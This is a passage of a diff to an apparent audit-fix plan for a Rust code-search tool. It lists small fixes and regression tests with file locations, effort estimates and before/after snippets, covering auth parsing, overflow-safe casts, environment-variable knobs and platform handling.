+**Bundles:** TC-ADV-1.30.1-1, TC-ADV-1.30.1-2, TC-ADV-1.30.1-3, TC-ADV-1.30.1-9, TC-ADV-1.30.1-10
+**Effort:** ~25 min total
+
+Add to `src/serve/auth.rs::tests`:
+
+```rust
+#[test]
+fn try_from_string_accepts_long_alphabet_input_today() {
+    // Pin current shape — no MAX_TOKEN_LEN cap exists.
+    // If a cap is ever added, this test should invert.
+    let long = "a".repeat(10_240);
+    assert!(AuthToken::try_from_string(long).is_ok());
+}
+
+#[test]
+fn auth_query_wrong_cookie_right_authenticates_via_cookie_no_redirect() {
+    // Pin: cookie wins over query. Stale ?token= survives in URL bar.
+    // SEC-7: this test pins the leakage gap. Invert when CQ-V1.30.1-4 lands.
+    // ... build req with valid cookie + ?token=wrong ...
+    // assert AuthOutcome::Ok (NOT OkViaQueryParam)
+}
+
+#[test]
+fn auth_query_right_cookie_wrong_redirects_and_overwrites_cookie() {
+    // ... build req with wrong cookie + ?token=right ...
+    // assert AuthOutcome::OkViaQueryParam (current behavior, regression-pin)
+}
+
+#[test]
+fn auth_two_cookies_with_same_name_uses_first_occurrence() {
+    // RFC 6265 allows duplicates; current code matches first.
+    // ... build req with `Cookie: cqs_token_8080=wrong; cqs_token_8080=right` ...
+    // assert 401 (first wrong one matches first; pin behavior)
+}
+
+#[test]
+fn bearer_lowercase_scheme_returns_401_today() {
+    // RFC 6750 §2.1 says case-insensitive; current code is strict.
+    // Pin current 401 behavior; invert when grammar is relaxed.
+    // ... build req with `Authorization: bearer <token>` ...
+    // assert 401
+}
+
+#[test]
+fn bearer_double_space_returns_401_today() {
+    // ... build req with `Authorization: Bearer  <token>` ...
+    // assert 401
+}
+
+#[test]
+fn bearer_no_separator_returns_401_today() {
+    // ... build req with `Authorization: Bearer<token>` ...
+    // assert 401
+}
+```
+
+Add to `src/daemon_translate.rs::tests`:
+
+```rust
+#[test]
+fn daemon_status_handles_err_envelope_with_no_message() {
+    // ... mock daemon writes `{"status":"err"}` (no message field) ...
+    // assert err string includes the raw envelope, not "daemon error: daemon error"
+}
+
+#[test]
+fn daemon_status_handles_err_envelope_with_non_string_message() {
+    // ... mock daemon writes `{"status":"err","message": 42}` ...
+    // assert err string surfaces the shape mismatch
+}
+
+#[test]
+fn unwrap_dispatch_payload_distinguishes_envelope_no_data_from_bare_form() {
+    // Send `{"data": null, "error": "internal", "version": 1}` — should surface error
+    // Signature: fn unwrap_dispatch_payload(output: &serde_json::Value, type_name: &str) -> Result<Value, String>
+    let v = serde_json::json!({"data": null, "error": "internal", "version": 1});
+    let result = unwrap_dispatch_payload(&v, "TestType");
+    assert!(result.is_err());  // not silently passing wrapper through
 }
 ```
 
 ---
 
-## P3.37 — `blame.rs` git_file via `normalize_slashes`
+## P3-TC-ADV-2 — `env_disables_freshness_gate`: rewrite to call function with real env
 
-**Finding:** P3.37
-**Files:** `src/cli/commands/io/blame.rs:113-115`
-**Why:** Current `replace('\\', "/")` only handles backslashes; verbatim `\\?\` prefix slips through, breaking `git log --format=... -- <file>`.
+**File:** `src/cli/commands/eval/mod.rs:282-290, 405-432`
+**Effort:** ~10 min
+**Finding:** TC-ADV-1.30.1-7
 
-### Current code
+**Fix:** Rewrite the test (currently re-implements function body inline) to actually call `env_disables_freshness_gate()` with `serial_test::serial(cqs_eval_require_fresh_env)`. Use the `unsafe` env-var save/restore pattern from `daemon_translate.rs::tests` (e.g., `reconcile_enabled_default_true`). Cover at minimum:
+
 ```rust
-let git_file = rel_file.replace('\\', "/");
-```
+#[test]
+#[serial_test::serial(cqs_eval_require_fresh_env)]
+fn env_disables_freshness_gate_real_env() {
+    // SAFETY: serial_test guards env-var collisions.
+    unsafe { std::env::remove_var("CQS_EVAL_REQUIRE_FRESH"); }
+    assert!(!env_disables_freshness_gate(), "unset = gate stays on");
 
-### Replacement
-```rust
-let git_file = crate::normalize_slashes(&rel_file);
-```
-
----
-
-## P3.38 — Daemon socket-path: warn on `XDG_RUNTIME_DIR` unset (Linux only)
-
-**Finding:** P3.38
-**Files:** `src/daemon_translate.rs:179-188`
-**Why:** Silent fallback to `/tmp` (mode 1777) hides a meaningful trust drop on multi-user Linux. macOS `/var/folders/...` is fine.
-
-### Current code
-```rust
-fn daemon_socket_path() -> PathBuf {
-    let dir = std::env::var_os("XDG_RUNTIME_DIR")
-        .map(PathBuf::from)
-        .unwrap_or_else(std::env::temp_dir);
-    dir.join(/* per-user socket name */)
+    for (val, expected) in [
+        ("0", true), ("false", true), ("no", true), ("off", true),
+        ("  off  ", true),    // whitespace
+        ("1", false), ("true", false),
+        ("garbage", false), ("", false),    // unknown / empty
+    ] {
+        unsafe { std::env::set_var("CQS_EVAL_REQUIRE_FRESH", val); }
+        assert_eq!(env_disables_freshness_gate(), expected,
+                   "value {val:?}: expected {expected}");
+    }
+    unsafe { std::env::remove_var("CQS_EVAL_REQUIRE_FRESH"); }
 }
 ```
 
-### Replacement
+Drop the inline-body test at `:405-432`.
+
+---
+
+## P3-TC-ADV-3 — Skip: covered by P1
+
+- **TC-ADV-1.30.1-8** (`delta_saturated=true → Fresh` test): **Covered by:** the CQ-V1.30.1-2 P1 fix, which changes the state machine so this test then asserts `Stale`. Add the test there, not separately.
+
+---
+
+## P3-RB-1 — `wait_for_fresh` defensive cap on `wait_secs`
+
+**File:** `src/daemon_translate.rs:660-662`
+**Effort:** ~3 min
+**Finding:** RB-2
+
+**Fix:**
 ```rust
-fn daemon_socket_path() -> PathBuf {
-    if let Some(d) = std::env::var_os("XDG_RUNTIME_DIR") {
-        return PathBuf::from(d).join(/* socket name */);
+// before:
+let deadline = std::time::Instant::now() + std::time::Duration::from_secs(wait_secs);
+
+// after — defensive cap to prevent Instant+Duration overflow:
+let wait_secs = wait_secs.min(86_400);
+let deadline = std::time::Instant::now() + std::time::Duration::from_secs(wait_secs);
+```
+
+---
+
+## P3-RB-2 — Hoist `unix_secs_i64()` helper for 5 cast sites
+
+**Bundles:** RB-3, RB-10
+**Effort:** ~10 min
+**Sites:** `src/watch_status.rs:229`, `src/cli/batch/mod.rs:779`, `src/cli/batch/mod.rs:1988`, `src/cli/commands/infra/ping.rs:122`, `src/cli/watch/mod.rs:159`
+
+**Fix:** Add to `src/lib.rs` (or `src/time.rs` if creating module):
+```rust
+/// Defensive `SystemTime::now() → Unix seconds as i64`. Returns `None` when
+/// the clock is before epoch (RTC mis-set, hypervisor pause, etc.) and
+/// emits a `tracing::warn!` once per process so journal surfaces bad-clock
+/// conditions. Use everywhere instead of bare `as_secs() as i64`.
+pub fn unix_secs_i64() -> Option<i64> {
+    use std::sync::OnceLock;
+    static WARNED: OnceLock<()> = OnceLock::new();
+    match std::time::SystemTime::now().duration_since(std::time::SystemTime::UNIX_EPOCH) {
+        Ok(d) => i64::try_from(d.as_secs()).ok(),
+        Err(_) => {
+            WARNED.get_or_init(|| {
+                tracing::warn!("system clock is before UNIX epoch — timestamps will be None");
+            });
+            None
+        }
     }
-    #[cfg(target_os = "linux")]
-    {
-        static WARNED: std::sync::OnceLock<()> = std::sync::OnceLock::new();
-        WARNED.get_or_init(|| {
-            tracing::info!(
-                "XDG_RUNTIME_DIR unset — daemon socket falls back to temp_dir; \
-                 consider XDG_RUNTIME_DIR=/run/user/$(id -u)"
-            );
-        });
-    }
-    std::env::temp_dir().join(/* socket name */)
 }
 ```
 
----
-
-## P3.39 — `write_slot_model` / `write_active_slot` use `atomic_replace`
-
-**Finding:** P3.39
-**Files:** `src/slot/mod.rs:237-277` (`write_slot_model`), `src/slot/mod.rs:363-406` (`write_active_slot`)
-**Why:** Bespoke temp+rename without parent-dir fsync. `crate::fs::atomic_replace` already does this for `notes.toml` / `audit-mode.json`.
-
-### Current code (sketch — both functions)
-```rust
-let tmp = dir.join(format!(".slot.toml.{}.tmp", temp_suffix()));
-let mut f = fs::File::create(&tmp)?;
-f.write_all(contents.as_bytes())?;
-f.sync_all()?;
-fs::rename(&tmp, &final_path)?;
-// no parent-dir fsync
-```
-
-### Replacement
-```rust
-crate::fs::atomic_replace(&final_path, contents.as_bytes())?;
-```
-Drop the bespoke temp+rename block from each function. ~20 LOC each.
+Migrate the 5 callsites:
+| Site | Current pattern |
+|------|----------------|
+| `watch_status.rs:226-231` (`now_unix_secs`) | replace body with `unix_secs_i64().unwrap_or(0)` — and consider changing return to `Option<i64>` per RB-10 (optional, slightly more invasive). |
+| `cli/batch/mod.rs:779` | swap `.map(\|d\| d.as_secs() as i64)` chain for `cqs::unix_secs_i64()` |
+| `cli/batch/mod.rs:1988` | same |
+| `cli/commands/infra/ping.rs:122` | same |
+| `cli/watch/mod.rs:159` (the `last_synced_at` line — uses metadata's modified time, NOT `SystemTime::now()`) | leave for a separate pass — different shape (`m.modified()` not `now()`); keep the `as_secs() as i64` but wrap in `i64::try_from(d.as_secs()).ok()` for overflow defense. |
 
 ---
 
-## P3.40 — `update_umap_coords_batch`: DROP TEMP TABLE before CREATE
+## P3-RB-3 — `as_millis() as i64` truncation in reindex
 
-**Finding:** P3.40
-**Files:** `src/store/chunks/crud.rs:392-450`
-**Why:** TEMP TABLE is connection-scoped, not transaction-scoped; rollback can leave a stale `_update_umap` between calls on the same pooled connection.
+**File:** `src/cli/watch/reindex.rs:507-508`
+**Effort:** ~3 min
+**Finding:** RB-4
 
-### Current code
+**Fix:**
 ```rust
-sqlx::query("CREATE TEMP TABLE IF NOT EXISTS _update_umap (...)").execute(&mut *tx).await?;
-sqlx::query("DELETE FROM _update_umap").execute(&mut *tx).await?;
-// ... INSERT INTO _update_umap, UPDATE chunks FROM _update_umap, DROP TABLE IF EXISTS _update_umap;
-```
+// before:
+.map(|d| d.as_millis() as i64)
 
-### Replacement
-```rust
-sqlx::query("DROP TABLE IF EXISTS _update_umap").execute(&mut *tx).await?;
-sqlx::query("CREATE TEMP TABLE _update_umap (...)").execute(&mut *tx).await?;
-// no DELETE needed; INSERT INTO _update_umap proceeds cleanly
+// after — surface overflow as None, treated same as missing mtime:
+.and_then(|d| i64::try_from(d.as_millis()).ok())
 ```
 
 ---
 
-## P3.41 — `reindex_files`: build embeddings without placeholders
+## P3-RB-4 — Cap `migrate_legacy` sentinel read
 
-**Finding:** P3.41
-**Files:** `src/cli/watch.rs:2918-2924`
-**Why:** Allocates N empty `Embedding::new(vec![])` placeholders then overwrites each — pure waste plus a future zero-norm-vector landmine.
+**File:** `src/slot/mod.rs:656`
+**Effort:** ~5 min
+**Finding:** RB-5
 
-### Current code
+**Fix:**
 ```rust
-let mut embeddings: Vec<Embedding> = vec![Embedding::new(vec![]); chunk_count];
-for (i, e) in cached { embeddings[i] = e; }
-for (i, e) in new_embeddings { embeddings[i] = e; }
-```
+// before:
+let detail = fs::read_to_string(&sentinel).unwrap_or_default();
 
-### Replacement
-Mirror the bulk-pipeline pattern (`src/cli/pipeline/embedding.rs::create_embedded_batch`):
-```rust
-let mut by_index: HashMap<usize, Embedding> = HashMap::with_capacity(chunk_count);
-for (i, e) in cached { by_index.insert(i, e); }
-for (i, e) in new_embeddings { by_index.insert(i, e); }
-let embeddings: Vec<Embedding> = (0..chunk_count)
-    .map(|i| by_index.remove(&i)
-        .unwrap_or_else(|| panic!("missing embedding at index {i}")))
-    .collect();
-```
-(Or refactor to call `create_embedded_batch` directly if its signature fits.)
-
----
-
-## P3.42 — `prepare_for_embedding`: skip store query when global cache satisfies all
-
-**Finding:** P3.42
-**Files:** `src/cli/pipeline/embedding.rs:64-82`
-**Why:** Always issues `store.get_embeddings_by_hashes` even when global cache has every entry; one wasted bind-heavy SELECT per warm reindex.
-
-### Current code (sketch)
-```rust
-let global_hits = global_cache.read_batch(&hashes, ...)?;
-let store_hits = store.get_embeddings_by_hashes(&hashes)?; // unconditional
-```
-
-### Replacement
-```rust
-let global_hits = global_cache.read_batch(&hashes, ...)?;
-let missed: Vec<&str> = hashes.iter()
-    .filter(|h| !global_hits.contains_key(h.as_str()))
-    .map(|h| h.as_str()).collect();
-let store_hits = if missed.is_empty() {
-    HashMap::new()
-} else {
-    store.get_embeddings_by_hashes(&missed)?
+// after — cap at 64 KiB matching SLOT_POINTER_MAX_BYTES sibling:
+let detail = {
+    use std::io::Read;
+    let mut buf = String::new();
+    fs::File::open(&sentinel)
+        .and_then(|f| f.take(64 * 1024).read_to_string(&mut buf).map(|_| ()))
+        .map(|_| buf)
+        .unwrap_or_default()
 };
 ```
 
 ---
 
-## P3.43 — Daemon socket: fold args validation + extraction into one pass
+## P3-RB-5 — `enumerate_files` strip_prefix mismatch warn-and-skip
 
-**Finding:** P3.43
-**Files:** `src/cli/watch.rs:266-297`
-**Why:** Every daemon query walks the args array twice (validation + extraction). Single pass collects both.
+**File:** `src/lib.rs:680-685`
+**Effort:** ~5 min
+**Finding:** RB-6
 
-### Current code
+**Fix:**
 ```rust
-let bad_arg_indices: Vec<usize> = arr.iter().enumerate()
-    .filter_map(|(i, v)| (!v.is_string()).then_some(i)).collect();
-if !bad_arg_indices.is_empty() { /* reject */ }
-let args: Vec<String> = arr.iter()
-    .filter_map(|v| v.as_str().map(String::from)).collect();
-```
+// before:
+if path.starts_with(&root) {
+    Some(path.strip_prefix(&root).unwrap_or(&path).to_path_buf())
+} else { /* ... */ }
 
-### Replacement
-```rust
-let mut args = Vec::with_capacity(arr.len());
-let mut bad_arg_indices = Vec::new();
-for (i, v) in arr.iter().enumerate() {
-    match v.as_str() {
-        Some(s) => args.push(s.to_string()),
-        None => bad_arg_indices.push(i),
+// after — surface case-insensitive-fs disagreement:
+match path.strip_prefix(&root) {
+    Ok(rel) => Some(rel.to_path_buf()),
+    Err(_) => {
+        tracing::warn!(
+            path = %path.display(),
+            root = %root.display(),
+            "starts_with said yes but strip_prefix failed — case-insensitive fs?"
+        );
+        None
     }
 }
-if !bad_arg_indices.is_empty() { /* reject as before */ }
 ```
 
 ---
 
-## P3.44 — `build_graph` edge dedup with hashed key
+## P3-RB-6 — Saturating cast on WatchSnapshot counters
 
-**Finding:** P3.44
-**Files:** `src/serve/data.rs:367-373`
-**Why:** `(file.clone(), caller.clone(), callee.clone())` allocates 3 Strings per row even on dedup miss. Hash to u64 instead.
+**File:** `src/watch_status.rs:213-218`
+**Effort:** ~3 min
+**Finding:** RB-7
 
-### Current code
+**Fix:** Replace bare `as u64` casts with saturating conversions (defense-in-depth, matches RB-V1.30-3 pattern):
 ```rust
-let key = (file.clone(), caller_name.clone(), callee_name.clone());
-if seen.insert(key) {
-    accum.push((file, caller_name, callee_name));
-}
-```
+// before:
+modified_files: input.pending_files_count as u64,
+pending_notes: input.pending_notes,
+rebuild_in_flight: input.rebuild_in_flight,
+delta_saturated: input.delta_saturated,
+incremental_count: input.incremental_count as u64,
+dropped_this_cycle: input.dropped_this_cycle as u64,
 
-### Replacement
-```rust
-use std::hash::{Hash, Hasher};
-use std::collections::hash_map::DefaultHasher;
-let mut h = DefaultHasher::new();
-file.hash(&mut h); caller_name.hash(&mut h); callee_name.hash(&mut h);
-if seen.insert(h.finish()) {
-    accum.push((file, caller_name, callee_name));
-}
+// after — saturating:
+modified_files: u64::try_from(input.pending_files_count).unwrap_or(u64::MAX),
+// (others unchanged or apply same pattern to incremental_count + dropped_this_cycle)
+incremental_count: u64::try_from(input.incremental_count).unwrap_or(u64::MAX),
+dropped_this_cycle: u64::try_from(input.dropped_this_cycle).unwrap_or(u64::MAX),
 ```
-Change `seen` type from `HashSet<(String,String,String)>` to `HashSet<u64>`.
 
 ---
 
-## P3.45 — `extract_imports`: borrow keys, allocate only on accept
+## P3-RB-7 — `print_text_report` empty-fixture refusal
 
-**Finding:** P3.45
-**Files:** `src/where_to_add.rs:258-276`
-**Why:** `seen.insert(trimmed.to_string())` per candidate line allocates even on rejection.
+**File:** `src/cli/commands/eval/mod.rs:296-309`
+**Effort:** ~5 min
+**Finding:** RB-8
 
-### Current code
+**Fix:** Short-circuit at the top of `print_text_report`:
 ```rust
-let mut seen: HashSet<String> = HashSet::new();
-let mut imports: Vec<String> = Vec::new();
-for chunk in chunks {
-    for line in chunk.content.lines() {
-        let trimmed = line.trim();
-        for &prefix in prefixes {
-            if trimmed.starts_with(prefix) && imports.len() < max
-                && seen.insert(trimmed.to_string()) {
-                imports.push(trimmed.to_string());
-                break;
+if report.overall.n == 0 {
+    eprintln!("[eval] no queries with gold_chunk; refusing to emit report (use --allow-empty to override)");
+    std::process::exit(2);
+}
+```
+Do this before computing `pct(...)`. Stops `NaN%` from leaking into reports and downstream gate checks.
+
+---
+
+## P3-SHL-1 — `wait_for_fresh` poll-interval env knob
+
+**File:** `src/daemon_translate.rs:663`
+**Effort:** ~5 min
+**Finding:** SHL-V1.30-2
+
+**Fix:** Add `CQS_FRESHNESS_POLL_MS` to `crate::limits` (default 250, floor 25, ceiling 5000). Read once per `wait_for_fresh` call (not cached) so tests can flip values.
+
+---
+
+## P3-SHL-2 — Drop `--require-fresh-secs` 600 s clamp (or warn on engagement)
+
+**File:** `src/cli/commands/eval/mod.rs:237`
+**Effort:** ~5 min
+**Finding:** SHL-V1.30-3
+
+**Fix (cheap):** Add `tracing::warn!` when the `min(600)` clamp engages:
+```rust
+let budget_secs = if wait_secs > 600 {
+    tracing::warn!(requested = wait_secs, capped = 600u64,
+        "--require-fresh-secs capped at 600 — set CQS_EVAL_REQUIRE_FRESH_MAX_SECS to override");
+    600
+} else { wait_secs };
+```
+Optionally read `CQS_EVAL_REQUIRE_FRESH_MAX_SECS` for an env override.
+
+---
+
+## P3-SHL-3 — Honor `CQS_GATHER_*` env vars in `task::run_task`
+
+**File:** `src/task.rs:19-25, 143-149`
+**Effort:** ~5 min
+**Finding:** SHL-V1.30-4
+
+**Fix:** Drop the `.with_max_expanded_nodes(TASK_GATHER_MAX_NODES)` override that masks `CQS_GATHER_MAX_NODES`. Either:
+- **Option (a):** Remove the `.with_*` calls so gather's existing env-knob defaults flow through.
+- **Option (b):** Rename to `CQS_TASK_GATHER_DEPTH` / `CQS_TASK_GATHER_MAX_NODES` env knobs that override the `TASK_*` constants per-task.
+
+Option (a) is the cheaper one — the user's `CQS_GATHER_*` setting just works.
+
+---
+
+## P3-SHL-4 — Onboard caps env knobs
+
+**File:** `src/onboard.rs:30-33, 174-175`
+**Effort:** ~5 min
+**Finding:** SHL-V1.30-5
+
+**Fix:** Promote `MAX_CALLEE_FETCH = 30` and `MAX_CALLER_FETCH = 15` to env-overridable resolvers:
+```rust
+fn max_callee_fetch() -> usize {
+    std::env::var("CQS_ONBOARD_CALLEE_FETCH")
+        .ok().and_then(|v| v.parse().ok()).unwrap_or(30)
+}
+fn max_caller_fetch() -> usize {
+    std::env::var("CQS_ONBOARD_CALLER_FETCH")
+        .ok().and_then(|v| v.parse().ok()).unwrap_or(15)
+}
+```
+Surface truncation in `OnboardSummary` JSON when caps engage so consumers see "I dropped N callers".
+
+---
+
+## P3-SHL-5 — `MAX_REFERENCES` env knob
+
+**File:** `src/config.rs:390-405`
+**Effort:** ~5 min
+**Finding:** SHL-V1.30-6
+
+**Fix:**
+```rust
+// before:
+const MAX_REFERENCES: usize = 20;
+
+// after — replace with crate::limits::max_references():
+fn max_references() -> usize {
+    std::env::var("CQS_MAX_REFERENCES")
+        .ok().and_then(|v| v.parse().ok()).unwrap_or(20)
+}
+```
+Update lines 391-404 to call `max_references()`. Memo the warning at load time so it doesn't fire on every `validate()`.
+
+---
+
+## P3-SHL-6 — Notes file-size + entry-count env knobs
+
+**File:** `src/note.rs:20, 169, 245`
+**Effort:** ~10 min
+**Finding:** SHL-V1.30-7
+
+**Fix:**
+1. Hoist the duplicated `const MAX_NOTES_FILE_SIZE: u64 = 10 * 1024 * 1024;` (lines 169, 245) to module scope, single declaration.
+2. Wrap with `crate::limits::max_notes_file_size()` reading `CQS_NOTES_MAX_FILE_SIZE` (default 10 MiB).
+3. Same for `MAX_NOTES = 10_000` (line 20) → `CQS_NOTES_MAX_ENTRIES`.
+4. Replace silent `.take(MAX_NOTES)` (line 331) with a `tracing::warn!` when truncation engages.
+
+---
+
+## P3-SHL-7 — `ENRICHMENT_PAGE_SIZE` env knob
+
+**File:** `src/cli/enrichment.rs:46, 127`
+**Effort:** ~3 min
+**Finding:** SHL-V1.30-8
+
+**Fix:**
+```rust
+fn enrichment_page_size() -> usize {
+    std::env::var("CQS_ENRICHMENT_PAGE_SIZE")
+        .ok().and_then(|v| v.parse().ok()).unwrap_or(500)
+}
+```
+Replace `ENRICHMENT_PAGE_SIZE` const at lines 46, 127 with the resolver.
+
+---
+
+## P3-SHL-8 — `LAST_INDEXED_PRUNE_SIZE_THRESHOLD` env knob
+
+**File:** `src/cli/watch/gc.rs:36-42`
+**Effort:** ~3 min
+**Finding:** SHL-V1.30-9
+
+**Fix:** Replace const with `crate::limits` resolver reading `CQS_WATCH_PRUNE_SIZE_THRESHOLD` (default 5_000). Update doc to drop "intentionally not an env var" wording.
+
+---
+
+## P3-SHL-9 — Drop `OnceLock` cache on `daemon_periodic_gc_cap`
+
+**File:** `src/cli/watch/gc.rs:78-86`
+**Effort:** ~3 min
+**Finding:** SHL-V1.30-10
+
+**Fix:**
+```rust
+// before:
+fn daemon_periodic_gc_cap() -> usize {
+    static CACHE: std::sync::OnceLock<usize> = std::sync::OnceLock::new();
+    *CACHE.get_or_init(|| {
+        std::env::var("CQS_DAEMON_PERIODIC_GC_CAP")
+            .ok().and_then(|v| v.parse().ok())
+            .unwrap_or(DAEMON_PERIODIC_GC_CAP_DEFAULT)
+    })
+}
+
+// after — read on every call so systemctl set-environment works:
+fn daemon_periodic_gc_cap() -> usize {
+    std::env::var("CQS_DAEMON_PERIODIC_GC_CAP")
+        .ok().and_then(|v| v.parse().ok())
+        .unwrap_or(DAEMON_PERIODIC_GC_CAP_DEFAULT)
+}
+```
+One `getenv` per GC tick is microseconds; ticks are minutes apart. Matches `reconcile_enabled` semantic.
+
+---
+
+## P3-AC-1 — Case-fold `is_structural_query`
+
+**File:** `src/search/router.rs:813-816`
+**Effort:** ~5 min
+**Finding:** AC-V1.30.1-2
+
+**Fix:** Note that line 643 already passes `&query_lower`, so the bug is at *other* callers (lines 900, 1265, 1275-1276) that pass raw query strings. Either:
+- **Option (a) (cleaner):** Lowercase inside `is_structural_query`:
+  ```rust
+  fn is_structural_query(query: &str) -> bool {
+      let query_lower = query.to_ascii_lowercase();
+      let query = query_lower.as_str();
+      // ... rest unchanged ...
+  }
+  ```
+- **Option (b):** Force every caller to pre-lowercase. (More fragile.)
+
+Pick option (a). Add a regression-pin test: `assert!(is_structural_query("Class Foo"))`, `assert!(is_structural_query("Trait Iterator"))`, `assert!(is_structural_query("FIND ALL STRUCTS"))`.
+
+---
+
+## P3-AC-2 — `wait_for_fresh` deadline-first ordering
+
+**File:** `src/daemon_translate.rs:660-679`
+**Effort:** ~5 min
+**Finding:** AC-V1.30.1-6
+
+**Reframed during verification:** the budget overrun is up to ~5 s (one `daemon_status` read+write timeout, set at `daemon_translate.rs:444`), not 30 s. Mechanical fix unchanged.
+
+**Fix:** Move the `if Instant::now() >= deadline` check *before* the `daemon_status` call so a stuck status RPC doesn't push the helper over budget by up to ~5 s (one `daemon_status` read+write timeout).
+```rust
+loop {
+    if std::time::Instant::now() >= deadline {
+        return FreshnessWait::Timeout(WatchSnapshot::unknown());
+    }
+    match daemon_status(cqs_dir) { ... }
+    // ... rest unchanged
+    std::thread::sleep(POLL_INTERVAL);
+}
+```
+
+---
+
+## P3-AC-3 — `BoundedScoreHeap::push` total_cmp on score equality
+
+**File:** `src/search/scoring/candidate.rs:231`
+**Effort:** ~3 min
+**Finding:** AC-V1.30.1-7
+
+**Fix:**
+```rust
+// before (line 231):
+let better = score > *worst_score || (score == *worst_score && id < *worst_id);
+
+// after — use total_cmp for consistency with the OrderedFloat wrapper:
+use std::cmp::Ordering;
+let better = match score.total_cmp(worst_score) {
+    Ordering::Greater => true,
+    Ordering::Equal => id < *worst_id,
+    Ordering::Less => false,
+};
+```
+Add a `debug_assert!(score.is_finite())` immediately above to pin the upstream filter invariant.
+
+---
+
+## P3-AC-4 — `idle_secs` sub-second resolution
+
+**File:** `src/watch_status.rs:219`
+**Effort:** ~3 min
+**Finding:** AC-V1.30.1-8
+
+**Fix:** Add `idle_ms: u64` field on `WatchSnapshot` populated from `last_event.elapsed().as_millis() as u64`. Keep `idle_secs` for backwards compat. Document the addition in the struct's wire-shape doc.
+
+---
+
+## P3-AC-5 — Skip: covered by P2
+
+- **AC-V1.30.1-3** (BFS expansion-capped score-bump): **Covered by:** P2 entry of same ID.
+- **AC-V1.30.1-9** (DefaultHasher socket name): **Covered by:** P2 entry of same ID.
+- **AC-V1.30.1-10** (incremental_count idle-clear reset): **Covered by:** P2 entry of same ID.
+
+---
+
+## P3-EX-1 — `log_query` table-driven via dispatch macro
+
+**File:** `src/cli/batch/commands.rs:508, 531, 567, 577, 581, 603`
+**Effort:** ~10 min
+**Finding:** EX-V1.30.1-3
+
+**Fix:** Extend the existing `for_each_batch_cmd_pipeability!` macro (line 372-447) with a `log_as: Option<&str>` column. The macro emits the `log_query` call automatically when `log_as` is `Some(name)`. Removes 6 hand-sprinkled call sites. Normalize the arg-struct field name to `query` (or add a `fn query(&self) -> &str` accessor) so the macro can reach it without the per-variant divergence (`args.description` vs `args.query`).
+
+---
+
+## P3-EX-2 — Centralize CQS_* env-var falsy parsing
+
+**File:** `src/cli/commands/eval/mod.rs:282-289` (callers across 30+ sites)
+**Effort:** ~10 min
+**Finding:** EX-V1.30.1-7
+
+**Fix:** Add to `src/lib.rs` (or new `src/env.rs` module):
+```rust
+const FALSY: &[&str] = &["0", "false", "no", "off"];
+const TRUTHY: &[&str] = &["1", "true", "yes", "on"];
+
+pub fn env_truthy(name: &str) -> bool {
+    std::env::var(name).map(|v| TRUTHY.contains(&v.trim().to_ascii_lowercase().as_str()))
+        .unwrap_or(false)
+}
+pub fn env_falsy(name: &str) -> bool {
+    std::env::var(name).map(|v| FALSY.contains(&v.trim().to_ascii_lowercase().as_str()))
+        .unwrap_or(false)
+}
+```
+Migrate `env_disables_freshness_gate()` to use `crate::env_falsy("CQS_EVAL_REQUIRE_FRESH")`. Audit can flag the 30+ other sites in a follow-up PR.
+
+---
+
+## P3-PB-1 — `--no-auth` warning uses `IpAddr::is_loopback()` (no false positives on 127.0.0.0/8)
+
+**File:** `src/cli/commands/serve.rs:27`
+**Effort:** ~5 min
+**Finding:** PB-V1.30.1-1
+
+**Reframed during verification:** the original "misses wildcard binds" framing is wrong — the existing predicate `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"` *does* warn for `0.0.0.0` and `::`. The real defect is the opposite: it over-warns on the rest of `127.0.0.0/8` (e.g. `127.0.0.2`), which are loopback. Refactoring to `IpAddr::is_loopback()` is still cleaner and keeps wildcard coverage intact.
+
+**Fix:** Replace the string-equality predicate with `IpAddr::is_loopback()`:
+```rust
+// before:
+if no_auth && bind != "127.0.0.1" && bind != "localhost" && bind != "::1" {
+
+// after — parse once, check is_loopback (suppresses warn for 127.0.0.0/8 and ::1 alike;
+// still warns for 0.0.0.0, ::, and any LAN address):
+let is_loopback = bind.parse::<std::net::IpAddr>()
+    .map(|ip| ip.is_loopback())
+    .unwrap_or(matches!(bind.as_str(), "localhost"));
+if no_auth && !is_loopback {
+```
+
+(Combine with P3-CQ-3 above — drop the redundant duplicate and keep this single warning as the canonical surface.)
+
+---
+
+## P3-PB-2 — `--bind localhost` resolution
+
+**File:** `src/cli/commands/serve.rs:39-41`
+**Effort:** ~5 min
+**Finding:** PB-V1.30.1-2
+
+**Fix:** Resolve `localhost` to `127.0.0.1` before `parse::<SocketAddr>`:
+```rust
+let bind_str = if bind == "localhost" { "127.0.0.1" } else { bind.as_str() };
+let bind_addr: SocketAddr = format!("{bind_str}:{port}")
+    .parse()
+    .with_context(|| format!("Failed to parse {bind_str}:{port} as a SocketAddr"))?;
+```
+
+---
+
+## P3-PB-3 — Skip: P2 territory
+
+- **PB-V1.30.1-3** (`tasklist INFO:` localized): **Covered by:** P2 entry of same ID.
+- **PB-V1.30.1-7** (Windows hook fire): **Covered by:** P2 entry of same ID.
+- **PB-V1.30.1-9** (reconcile path normalization): **Covered by:** P2 entry of same ID.
+
+---
+
+## P3-PB-4 — `atomic_replace` skip parent-dir fsync on Windows
+
+**File:** `src/fs.rs:90-108`
+**Effort:** ~3 min
+**Finding:** PB-V1.30.1-6
+
+**Fix:** Wrap the parent-fsync block in `#[cfg(unix)]`:
+```rust
+// before:
+if let Some(parent) = final_path.parent() {
+    match std::fs::File::open(parent) { ... }
+}
+
+// after:
+#[cfg(unix)]
+if let Some(parent) = final_path.parent() {
+    match std::fs::File::open(parent) { ... }
+}
+```
+The doc comment at line 85-89 already promises this no-op behavior. One syscall less per persisted file on Windows; debug-spam ends.
+
+---
+
+## P3-PB-5 — `git_dir` path normalization in hook reports
+
+**File:** `src/cli/commands/infra/hook.rs:99-105, 152, 354`
+**Effort:** ~10 min
+**Finding:** PB-V1.30.1-8
+
+**Fix:** Change `git_dir: PathBuf` → `git_dir: String` on `InstallReport`, `UninstallReport`, `StatusReport`, `FireReport`. Store `cqs::normalize_path(&path)` at construction. Same for `dirty_marker: Option<PathBuf>` → `Option<String>`. Match the convention in the rest of the JSON surface (per `src/store/types.rs:220`).
+
+---
+
+## P3-PB-6 — Linux daemon restart fallback when systemd unit missing
+
+**File:** `src/cli/commands/infra/model.rs:710-738`
+**Effort:** ~10 min
+**Finding:** PB-V1.30.1-10
+
+**Fix:** Probe `systemctl --user is-enabled cqs-watch` first. On exit code != 0 (unit not loaded), fall back to spawning `cqs watch --serve` directly — same pattern as the macOS branch at line 745.
+```rust
+let probe = std::process::Command::new("systemctl")
+    .args(["--user", "is-enabled", "cqs-watch"])
+    .output();
